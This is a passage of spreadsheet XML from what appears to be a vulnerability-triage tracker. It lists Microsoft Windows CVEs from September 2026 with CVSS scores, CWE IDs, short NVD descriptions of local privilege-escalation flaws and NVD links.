t="inlineStr"><is><t>NVD</t></is></c><c r="O531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P531" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q531" s="5" t="inlineStr" /><c r="R531" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S531" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t></is></c></row><row r="532"><c r="A532" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C532" s="5" t="inlineStr"><is><t>CVE-2026-69532</t></is></c><c r="D532" s="5" t="n"><v>7.8</v></c><c r="E532" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F532" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G532" s="5" t="inlineStr" /><c r="H532" s="5" t="n"><v>0.003</v></c><c r="I532" s="5" t="inlineStr" /><c r="J532" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K53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32" s="5" t="inlineStr" /><c r="M532" s="5" t="inlineStr" /><c r="N532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P532" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q532" s="5" t="inlineStr" /><c r="R532" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S532" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t></is></c></row><row r="533"><c r="A533" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C533" s="5" t="inlineStr"><is><t>CVE-2026-69534</t></is></c><c r="D533" s="5" t="n"><v>7.8</v></c><c r="E533" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F533" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G533" s="5" t="inlineStr" /><c r="H533" s="5" t="n"><v>0.006</v></c><c r="I533" s="5" t="inlineStr" /><c r="J533" s="5" t="inlineStr" /><c r="K533" s="5" t="inlineStr" /><c r="L533" s="5" t="inlineStr" /><c r="M533" s="5" t="inlineStr" /><c r="N533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P533" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q533" s="5" t="inlineStr" /><c r="R533" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S533" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t></is></c></row><row r="534"><c r="A534" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C534" s="5" t="inlineStr"><is><t>CVE-2026-69535</t></is></c><c r="D534" s="5" t="n"><v>7.8</v></c><c r="E534" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F534" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G534" s="5" t="inlineStr" /><c r="H534" s="5" t="n"><v>0.002</v></c><c r="I534" s="5" t="inlineStr" /><c r="J534" s="5" t="inlineStr" /><c r="K534" s="5" t="inlineStr" /><c r="L534" s="5" t="inlineStr" /><c r="M534" s="5" t="inlineStr" /><c r="N534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P534" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q534" s="5" t="inlineStr" /><c r="R534" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S534" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t></is></c></row><row r="535"><c r="A535" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C535" s="5" t="inlineStr"><is><t>CVE-2026-69538</t></is></c><c r="D535" s="5" t="n"><v>7.8</v></c><c r="E535" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F535" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G535" s="5" t="inlineStr" /><c r="H535" s="5" t="n"><v>0.002</v></c><c r="I535" s="5" t="inlineStr" /><c r="J535" s="5" t="inlineStr" /><c r="K535" s="5" t="inlineStr" /><c r="L535" s="5" t="inlineStr" /><c r="M535" s="5" t="inlineStr" /><c r="N535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P535" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q535" s="5" t="inlineStr" /><c r="R535" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S535" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t></is></c></row><row r="536"><c r="A536" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C536" s="5" t="inlineStr"><is><t>CVE-2026-69541</t></is></c><c r="D536" s="5" t="n"><v>7.8</v></c><c r="E536" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F536" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G536" s="5" t="inlineStr" /><c r="H536" s="5" t="n"><v>0.003</v></c><c r="I536" s="5" t="inlineStr" /><c r="J536" s="5" t="inlineStr" /><c r="K536" s="5" t="inlineStr" /><c r="L536" s="5" t="inlineStr" /><c r="M536" s="5" t="inlineStr" /><c r="N536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q536" s="5" t="inlineStr" /><c r="R536" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S536" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t></is></c></row><row r="537"><c r="A537" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C537" s="5" t="inlineStr"><is><t>CVE-2026-69542</t></is></c><c r="D537" s="5" t="n"><v>7.8</v></c><c r="E537" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F537" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G537" s="5" t="inlineStr" /><c r="H537" s="5" t="n"><v>0.002</v></c><c r="I537" s="5" t="inlineStr" /><c r="J537" s="5" t="inlineStr" /><c r="K537" s="5" t="inlineStr" /><c r="L537" s="5" t="inlineStr" /><c r="M537" s="5" t="inlineStr" /><c r="N537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P537" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q537" s="5" t="inlineStr" /><c r="R537" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S537" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t></is></c></row><row r="538"><c r="A538" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C538" s="5" t="inlineStr"><is><t>CVE-2026-69544</t></is></c><c r="D538" s="5" t="n"><v>7.8</v></c><c r="E538" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F538" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G538" s="5" t="inlineStr" /><c r="H538" s="5" t="n"><v>0.003</v></c><c r="I538" s="5" t="inlineStr" /><c r="J538" s="5" t="inlineStr" /><c r="K538" s="5" t="inlineStr" /><c r="L538" s="5" t="inlineStr" /><c r="M538" s="5" t="inlineStr" /><c r="N538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P538" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q538" s="5" t="inlineStr" /><c r="R538" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S538" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t></is></c></row><row r="539"><c r="A539" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C539" s="5" t="inlineStr"><is><t>CVE-2026-69561</t></is></c><c r="D539" s="5" t="n"><v>7.8</v></c><c r="E539" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F539" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G539" s="5" t="inlineStr" /><c r="H539" s="5" t="n"><v>0.003</v></c><c r="I539" s="5" t="inlineStr" /><c r="J539" s="5" t="inlineStr" /><c r="K539" s="5" t="inlineStr" /><c r="L539" s="5" t="inlineStr" /><c r="M539" s="5" t="inlineStr" /><c r="N539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P539" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q539" s="5" t="inlineStr" /><c r="R539" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S539" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t></is></c></row><row r="540"><c r="A540" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C540" s="5" t="inlineStr"><is><t>CVE-2026-69571</t></is></c><c r="D540" s="5" t="n"><v>7.8</v></c><c r="E540" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F540" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G540" s="5" t="inlineStr" /><c r="H540" s="5" t="n"><v>0.003</v></c><c r="I540" s="5" t="inlineStr" /><c r="J540" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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40" s="5" t="inlineStr" /><c r="M540" s="5" t="inlineStr" /><c r="N540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P540" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q540" s="5" t="inlineStr" /><c r="R540" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S540" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t></is></c></row><row r="541"><c r="A541" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C541" s="5" t="inlineStr"><is><t>CVE-2026-69576</t></is></c><c r="D541" s="5" t="n"><v>7.8</v></c><c r="E541" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F541" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G541" s="5" t="inlineStr" /><c r="H541" s="5" t="n"><v>0.003</v></c><c r="I541" s="5" t="inlineStr" /><c r="J541" s="5" t="inlineStr" /><c r="K541" s="5" t="inlineStr" /><c r="L541" s="5" t="inlineStr" /><c r="M541" s="5" t="inlineStr" /><c r="N541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q541" s="5" t="inlineStr" /><c r="R541" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S541" s="5" t="inlineStr"><is><t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t></is></c></row><row r="542"><c r="A542" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C542" s="5" t="inlineStr"><is><t>CVE-2026-69580</t></is></c><c r="D542" s="5" t="n"><v>7.8</v></c><c r="E542" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F542" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G542" s="5" t="inlineStr" /><c r="H542" s="5" t="n"><v>0.003</v></c><c r="I542" s="5" t="inlineStr" /><c r="J542" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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2" s="5" t="inlineStr" /><c r="M542" s="5" t="inlineStr" /><c r="N542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P542" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q542" s="5" t="inlineStr" /><c r="R542" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S542" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t></is></c></row><row r="543"><c r="A543" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C543" s="5" t="inlineStr"><is><t>CVE-2026-69582</t></is></c><c r="D543" s="5" t="n"><v>7.8</v></c><c r="E543" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F543" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G543" s="5" t="inlineStr" /><c r="H543" s="5" t="n"><v>0.003</v></c><c r="I543" s="5" t="inlineStr" /><c r="J543" s="5" t="inlineStr" /><c r="K543" s="5" t="inlineStr" /><c r="L543" s="5" t="inlineStr" /><c r="M543" s="5" t="inlineStr" /><c r="N543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P543" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q543" s="5" t="inlineStr" /><c r="R543" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S543" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t></is></c></row><row r="544"><c r="A544" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C544" s="5" t="inlineStr"><is><t>CVE-2026-69583</t></is></c><c r="D544" s="5" t="n"><v>7.8</v></c><c r="E544" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F544" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G544" s="5" t="inlineStr" /><c r="H544" s="5" t="n"><v>0.003</v></c><c r="I544" s="5" t="inlineStr" /><c r="J544" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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4" s="5" t="inlineStr" /><c r="M544" s="5" t="inlineStr" /><c r="N544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P544" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q544" s="5" t="inlineStr" /><c r="R544" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S544" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t></is></c></row><row r="545"><c r="A545" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C545" s="5" t="inlineStr"><is><t>CVE-2026-69584</t></is></c><c r="D545" s="5" t="n"><v>7.8</v></c><c r="E545" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F545" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G545" s="5" t="inlineStr" /><c r="H545" s="5" t="n"><v>0.003</v></c><c r="I545" s="5" t="inlineStr" /><c r="J545" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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45" s="5" t="inlineStr" /><c r="M545" s="5" t="inlineStr" /><c r="N545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P545" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q545" s="5" t="inlineStr" /><c r="R545" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S545" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t></is></c></row><row r="546"><c r="A546" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C546" s="5" t="inlineStr"><is><t>CVE-2026-69585</t></is></c><c r="D546" s="5" t="n"><v>7.8</v></c><c r="E546" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F546" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G546" s="5" t="inlineStr" /><c r="H546" s="5" t="n"><v>0.004</v></c><c r="I546" s="5" t="inlineStr" /><c r="J546" s="5" t="inlineStr" /><c r="K546" s="5" t="inlineStr" /><c r="L546" s="5" t="inlineStr" /><c r="M546" s="5" t="inlineStr" /><c r="N546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q546" s="5" t="inlineStr" /><c r="R546" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S546" s="5" t="inlineStr"><is><t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t></is></c></row><row r="547"><c r="A547" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C547" s="5" t="inlineStr"><is><t>CVE-2026-69589</t></is></c><c r="D547" s="5" t="n"><v>7.8</v></c><c r="E547" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F547" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G547" s="5" t="inlineStr" /><c r="H547" s="5" t="n"><v>0.003</v></c><c r="I547" s="5" t="inlineStr" /><c r="J547" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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7" s="5" t="inlineStr" /><c r="M547" s="5" t="inlineStr" /><c r="N547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P547" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q547" s="5" t="inlineStr" /><c r="R547" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S547" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t></is></c></row><row r="548"><c r="A548" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C548" s="5" t="inlineStr"><is><t>CVE-2026-69592</t></is></c><c r="D548" s="5" t="n"><v>7.8</v></c><c r="E548" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F548" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G548" s="5" t="inlineStr" /><c r="H548" s="5" t="n"><v>0.003</v></c><c r="I548" s="5" t="inlineStr" /><c r="J548" s="5" t="inlineStr" /><c r="K548" s="5" t="inlineStr" /><c r="L548" s="5" t="inlineStr" /><c r="M548" s="5" t="inlineStr" /><c r="N548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P548" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q548" s="5" t="inlineStr" /><c r="R548" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S548" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t></is></c></row><row r="549"><c r="A549" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C549" s="5" t="inlineStr"><is><t>CVE-2026-69593</t></is></c><c r="D549" s="5" t="n"><v>7.8</v></c><c r="E549" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F549" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G549" s="5" t="inlineStr" /><c r="H549" s="5" t="n"><v>0.003</v></c><c r="I549" s="5" t="inlineStr" /><c r="J549" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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9" s="5" t="inlineStr" /><c r="M549" s="5" t="inlineStr" /><c r="N549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P549" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q549" s="5" t="inlineStr" /><c r="R549" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S549" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t></is></c></row><row r="550"><c r="A550" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C550" s="5" t="inlineStr"><is><t>CVE-2026-69594</t></is></c><c r="D550" s="5" t="n"><v>7.8</v></c><c r="E550" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F550" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G550" s="5" t="inlineStr" /><c r="H550" s="5" t="n"><v>0.003</v></c><c r="I550" s="5" t="inlineStr" /><c r="J550" s="5" t="inlineStr" /><c r="K550" s="5" t="inlineStr" /><c r="L550" s="5" t="inlineStr" /><c r="M550" s="5" t="inlineStr" /><c r="N550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P550" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q550" s="5" t="inlineStr" /><c r="R550" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S550" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t></is></c></row><row r="551"><c r="A551" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C551" s="5" t="inlineStr"><is><t>CVE-2026-69604</t></is></c><c r="D551" s="5" t="n"><v>7.8</v></c><c r="E551" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F551" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G551" s="5" t="inlineStr" /><c r="H551" s="5" t="n"><v>0.003</v></c><c r="I551" s="5" t="inlineStr" /><c r="J551" s="5" t="inlineStr" /><c r="K551" s="5" t="inlineStr" /><c r="L551" s="5" t="inlineStr" /><c r="M551" s="5" t="inlineStr" /><c r="N551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P551" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q551" s="5" t="inlineStr" /><c r="R551" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S551" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t></is></c></row><row r="552"><c r="A552" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C552" s="5" t="inlineStr"><is><t>CVE-2026-69608</t></is></c><c r="D552" s="5" t="n"><v>7.8</v></c><c r="E552" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F552" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G552" s="5" t="inlineStr" /><c r="H552" s="5" t="n"><v>0.003</v></c><c r="I552" s="5" t="inlineStr" /><c r="J552" s="5" t="inlineStr" /><c r="K552" s="5" t="inlineStr" /><c r="L552" s="5" t="inlineStr" /><c r="M552" s="5" t="inlineStr" /><c r="N552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P552" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q552" s="5" t="inlineStr" /><c r="R552" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S552" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t></is></c></row><row r="553"><c r="A553" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C553" s="5" t="inlineStr"><is><t>CVE-2026-69612</t></is></c><c r="D553" s="5" t="n"><v>7.8</v></c><c r="E553" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F553" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G553" s="5" t="inlineStr" /><c r="H553" s="5" t="n"><v>0.004</v></c><c r="I553" s="5" t="inlineStr" /><c r="J553" s="5" t="inlineStr" /><c r="K553" s="5" t="inlineStr" /><c r="L553" s="5" t="inlineStr" /><c r="M553" s="5" t="inlineStr" /><c r="N553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q553" s="5" t="inlineStr" /><c r="R553" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S553" s="5" t="inlineStr"><is><t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t></is></c></row><row r="554"><c r="A554" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C554" s="5" t="inlineStr"><is><t>CVE-2026-69685</t></is></c><c r="D554" s="5" t="n"><v>7.8</v></c><c r="E554" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F554" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G554" s="5" t="inlineStr" /><c r="H554" s="5" t="n"><v>0.003</v></c><c r="I554" s="5" t="inlineStr" /><c r="J554" s="5" t="inlineStr" /><c r="K554" s="5" t="inlineStr" /><c r="L554" s="5" t="inlineStr" /><c r="M554" s="5" t="inlineStr" /><c r="N554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O554" s="5" 